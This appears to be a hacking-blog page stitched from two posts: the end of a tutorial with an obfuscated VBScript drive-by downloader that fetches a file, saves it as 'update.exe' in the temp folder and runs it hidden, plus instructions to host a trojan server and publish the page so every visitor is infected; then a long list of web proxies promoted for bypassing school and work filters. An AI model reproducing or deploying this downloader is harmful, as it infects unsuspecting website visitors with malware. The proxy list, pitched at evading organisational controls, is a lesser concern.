strb1=ab1&ab2&ab3&ab4&ab5&ab6
strb5=strb1
set YY = df.createobject(strb5,"")
YY.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fnamezz1="update.exe"
scripp1="Scrip"
scripp2="ting"
scripp3=".Fil"
scripp4="eSyste"
scripp5="mObject"
scripp=scripp1&scripp2&scripp3&scripp4&scripp5
set FF = df.createobject(scripp,"")
set tmp = F.GetSpecialFolder(2)
fnamezz1= FF.BuildPath(tmp,fnamezz1)
YY.open
YY.write x.responseBody
YY.savetofile fnamezz1,2
YY.close
set MM = df.createobject("Shell.Application","")
MM.ShellExecute fnamezz1,"","","open",0
</script>
</BODY>
</HTML>

This was a normal html code which would create a simple webpage.

Now what you have to do is, the server file of your trojan you will have to upload it on some webhosting and then change the link of the server file in the code and then save this code as "index.html" and then upload it to the same host.

All done, now everytime someone opens that webpage they would be infected with your trojan's server.

List of Best Proxy Servers

What is a Proxy server ?

In computer networks, a proxy server is a server (a computer system or an application program) that acts as an intermediary for requests from clients seeking resources from other servers. A client connects to the proxy server, requesting some service, such as a file, connection, web page, or other resource, available from a different server. The proxy server evaluates the request according to its filtering rules. For example, it may filter traffic by IP address or protocol. If the request is validated by the filter, the proxy provides the resource by connecting to the relevant server and requesting the service on behalf of the client. A proxy server may optionally alter the client’s request or the server’s response, and sometimes it may serve the request without contacting the specified server. In this case, it ‘caches’ responses from the remote server, and returns subsequent requests for the same content directly.(Wikipedia)
So here is the List of best anonymizers and proxy servers o bypass webfilters !
Anonymouse – a very good free anonymizer. By using this CGI proxy you can anonymously surf web pages, send anonymous e-mails and look at news.
URL (for proxy chaining):
ShadowBrowser – anonymously surf the internet and protect your Internet history at the same time. No software to download and supports SSL websites.
www.ProxyKing.net – This anonymizer service keeps websites from tracking your internet movements by preventing them from placing cookies on your home computer.
URL (for making proxy chaining):
AnonymousIndex.com – Anonymous private surfing service, hide your ip, manage website ads, referrers and cookies through this free web based proxy.
URL (for proxy chaining):
www.HideMyAss.com – Free anonymous browsing, for the times when you REALLY need to hide your ass online!
URL (for proxy chaining):
Proxy7.com Free webbased proxy. By using this proxy you can surf the Internet securely and safely. This anonymizer service keeps websites from tracking your internet movements by preventing them from placing cookies on your home computer.
URL (for proxy-chains):
www.ProxyFoxy.com – Proxy Foxy offers you free anonymous surfing. With our free tool you can surf the Internet safe and secure without revealing your identity. Avoid cookies, spyware and other malicious scripts.
URL (for making proxy chaining):
78Y.NET – It is a web anonymous web proxy designed to bypass proxy restrictions through a web interface. If, for example, in your university, college, job, etc, the IT department blocks a lot of harmless websites simply because of their popularity, so you can use 78Y.NET proxy service to access those websites.
URL (to create proxy chains):
www.75i.net - 75I.NET is anonymous CGI Proxy that allows anyone to surf the Internet privately and securely without any restrictions. 75I.NET anonymous web surfing proxy service is free.
URL (to create chains of proxies):
www.dzzt.com – This anonymizer always hides your IP address, so all sites will not be able to uniquely your identify or track you. You’re able to access from your school, college, university, etc, the websites, which are restricted by your IT department.
URL (for proxy chaining):
Proxy Guy – The Proxy Guy offers free anonymous surfing. Now you can surf safe and secure with the click of a button.
URL (for making proxy chaining):
www.GamesProxy.com – Games Proxy helps you to play all your favourite flash games free online by using fast secure web proxy. Apart from playing free flash games you can also use Games Proxy to browse all your favourite sites such as ebay, hotmail & more!
www.proxyz.be – It is a free internet service which allows you to surf anonymously and it “changes” your ip. You can also use it to access/bypass blocked websites on your school or office.
URL (for making proxy chaining):
www.antifw.tk – Anti-firewall redirector. It allows to hide your IP and a name and a type of the file you gets from internet. Now corporate internet firewall will not be able to determine your internet activity.
www.ProxyHero.com – Fast and Secure US Proxy. PHP Based, and very easy to use. Completely free, and will keep you anonymous while browsing the internet.
URL (for making proxy chaining):
www.ProxyDrop.com – This is a free CGI proxy with HTTPS support. This service also includes the usual features including removing client side scripting, showing text only and enabling or disabling cookies. It also supports rotate13 or base64 URL encoding. Mirror1 Mirror2 Mirror3 Mirror4
URL (for making proxy chaining):
www.prx1.com – This is a free, safe, anonymous web proxy with configurable options. Browsing anonymously with prx1.com increases your security and lets you access web sites from behind a firewall.
URL (for making proxy chains):
www.ninjaproxy.com
 It is a free anonymous web based proxy service. With Ninja Proxy you can browse your favorite web sites anonymously and even from behind a firewall with blocked ports.
URL (for making proxy chains):
ShadowSurf free anonymous proxy – Surf privately and 100% anonymously with ShadowSurf’s FREE web proxy. You can access blocked sites while keeping your IP secret. No software needed.
URL (for making proxy chaining):
Famous5.net Proxy – Free browser based anonymizer without any software. Bypass bans and hide your ip through famous5.net proxy.
URL (for making proxy chains):
No1Proxy.com -
 Free proxy site with a cgi proxy tool, daily updated proxy lists and information on anonymous and https proxy servers. 
URL (for creating proxy chain): http://www.no1proxy.com
ProxySpy.com – Proxy Spy protects your privacy and keeps your computer secure by allowing you without revealing your IP address or personal information. Proxy Spy has a range of features including disabling javascript, encoding URLs to bypass filters, disable showing of images, reject cookies etc. Proxy Spy is hosted on a fast server with high uptime – this means you can always count on it, day or night, to protect you.
TheProxy.be – TheProxy always hides your IP address, so all sites will not be able to uniquely your identify or track you. It`s absolutely free. Mirror Mirror1
URL (for making proxy chains):
ProxyPrince.com – Very fast US based PHP proxy. Very easy to use, and very quick. ProxyPrince will keep you safe and secure. Anonimity is our main concern, your tracks are sure to be kept hidden.
PimpMyIP.com – Free anonymous web proxy. Bypass blocked websites and browse privately at work or school. Shields you against cookies, spyware and malicious scripts.
OhMyProxy.com – Free Anonymous Browsing. Hide your IP and get past school and work filters.
Clever Proxy – Clever Proxy is a smart and intelligent web-based proxy service. It allows you to remain anonymous whilst using the internet. By using this anonymizer you will also be protecting your computer because when you surf anonymously people cannot find out your IP address and attempt to hack you.
A Proxy Site – A Proxy Site is a simple and reliable web-based anonymizer. By using it you can bypass filters and remain completely anonymous whilst surfing the internet. It has many features including blocking JavaScript and cookies.
Fully Sick Proxy – Fully Sick proxy allows you to remain anonymous on the internet by routing web requests for you. This means you can stay protected and also disable javascript and block cookies. Our site is fast and reliable too.
Desire Proxy – Desire proxy is a premium free anonymous proxy. It provides many of the features of the paid services for nothing! These include cookie removal, no image browsing and more. Keep anonymous and keep secure with Desire Proxy. We know what you desire!
Perfect Proxy – Perfect Proxy is just that – perfect! It provides excellent reliability and website support and also keeps you anonymous in the process. It has many additional features to add to the experience.
Prime Proxy – Prime Proxy provides a great free proxy service to the general public. It keeps you anonymous and safe whilst browsing your favorite websites. Prime Proxy is used by students and adults in many different situations. Try us today – it’s 100% free!
Proxy Aware – Since you’re visiting freeproxy.ru you must be proxy aware, so why not check out Proxy Aware? It’s a perfect free proxy which keeps you anonymous whilst browsing the web! It has many additional features such as cookie blocking, disabling images and URL encoding to bypass school and work filters.
Proxy Craze – At the moment there is a proxy craze going on, and Proxy Craze is proud to be part of it! With a delicious serving of features to make any proxy user cry, Proxy Craze is the proxy of choice! Features include URL encoding, cookie blocking / image blocking, and a neat interface!
Proxy Gasp – Our proxy is so good it will make you gasp – as the name suggests. To use this proxy simply type the URL into the website and gasp.your at the site remaining totally anonymous! This means websites cannot record your IP and later use it to hack or send you junk!
Proxy Please – Well, thanks for saying please! This is a great proxy site with all the usual features including cookie blocking, no images, URL encoding all whilst being extremely fast and reliable. If you want to bypass filters then this is the site you need!
Some Proxy – Easy to remember domain, great features, and nice and fast! Keeps you totally anonymous whilst browsing the internet, and allows you to bypass filters and school or at work. Features include URL encoding and cookie blocking!
Stupid Proxy – Despite the name, this proxy is anything but stupid! If you’re going to use a proxy, use Stupid Proxy! It’s no frills yet great to use including many simple features that will make your life easier including URL encoding (bypass filters) and imageless browsing. Enjoy!
That Proxy – Which proxy – this proxy? Why not! A bunch of excellent features, fast and reliable and a clean and neat design are all reasons why you should choose ‘That Proxy’! By using our site you will remain anonymous and avoid security issues like people hacking your computer.
Want Proxy – For you to be at this site you must want some proxy, so all you need to do is type that in, and finish it with a .com, and you’re done! ‘Want Proxy’ is an excellent proxy site that you’ll end up using all the time. It’s a favorite amongst students and workers who want to bypass filters.
www.UnBlockMySpace.com – Unblock MySpace is a free service created to view MySpace proxy website from school and work computers through a PHP and CGI backend (web based proxy). This site uses the server proxy IP for surfing the web anonymously. Protect your privacy! Surf Anonymously! Bypass Security Filters! Private Browsing!
www.ProxyForAll.com – Free and secure cgi web based proxy site. Surf the net from Work, school or home. Keep your info safe from hackers.
www.MyProxySurfer.com – Free and secure cgi web based proxy site. Surf the net from Work, school or home. Keep your info safe from hackers.
www.ProxyCat.com Proxycat.com is a free easy to use cgi proxy service that blocks cookies and hides your IP to keep you anonymous as you surf the web.
www.ProxyDetective.com ProxyDetective – Simple and Free cgi-webbased anonymous proxy surfing. Surf safely from your work, school or home.
www.indianproxy.com – Access your webmail, myspace, and much more in school or work anonymously.
www.proxybrowsing.com – Access blocked websites in school or work safely and anonymously. Surf with Ad Free Browsing Pages!
www.ProxyPi.com – We do not sleep until you have a safe route. Use us at school, work or home. We can bypass most filters.
www.proxyjet.com – Hide your movements via our anonymous proxy. Our proxy will bypass school and work filters.
www.justhide.com – We allow you to bypass your school and work filters to allow you surf the internet anonymously.
Other anonymizers
Anonymization – free web anonymyzer. Supports anonymous web surfing, anonymous web seek (meta search by many search engines) and FTP surf – surf anonymously in any FTP server. By using this web proxy you can surf anonymously more than 5.000.000.000 web pages.
URL (for proxy chaining):
Guardster – good anonymizer. Controls cookies, scripts, ADs, images and referrers.
URL (for proxy chaining):
ProxyWeb – good anonymizer, can delete Java, JavaScript, cookies and ActiveX. Also this web proxy uses HTTPS (secure) connection – so nobody can detect what you download from Internet.
URL (for proxy chaining):
WebWarper – This is a popular free web anonymizer. This CGI proxy can pack web pages “on the fly”.
URL (for proxy chaining):
MegaProxy – Free anonymizer can work with HTTPS sites.
URL (for proxy chaining):
W3Privacy.com – free web based anonymizing proxy. Instant access, no download, no registration, and no fee required.
URL (for proxy chaining):
Anonymizer.RU – russian anonymizer: this russian CGI proxy has many additional options only after registration.
URL (for proxy chaining):
The-cloak – This is a free CGI proxy. This anonymizer supports HTTP, FTP and HTTPS sessions. Can hide referrers. Requires payment..
URL (for chaining proxy):
Pure privacy – cool anonymizer + remailer. You can use this anonymizer to send anonymous e-mails (by using this anonymizer with anonymous proxy)
URL (for proxy chaining):
Proxify.com – Good fast anonymizer that can remove cookies, ADs, referrers and can use HTTPS connections.
URL (for proxy chaining):
http://www.urlencoded.com– The better cgi proxy server. It has many different features, inclusive enabling / disabling cookies, all scripts, AD banners, referrer information, browser and OS info and many more.
URL (for cgi proxy chaining):
http://www.snoopblocker.com – Good cgi proxy (anonymizer). It uses 128-bit SSL-encoding. Can enable/lock Java, JavaScript, Cookies, ActiveX.
URL (for creating anonymizers chain):
www.psurf.net – Psurf is one of the fatest proxy services on the net. Using new and advanced technology to help you bypass your school firewalls and filters. Allowing you to view what you want, when you want!
http://www.proxy121.com– The 121 relationship between you and annonimity. Fast, reliable and secure! Mirror1

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More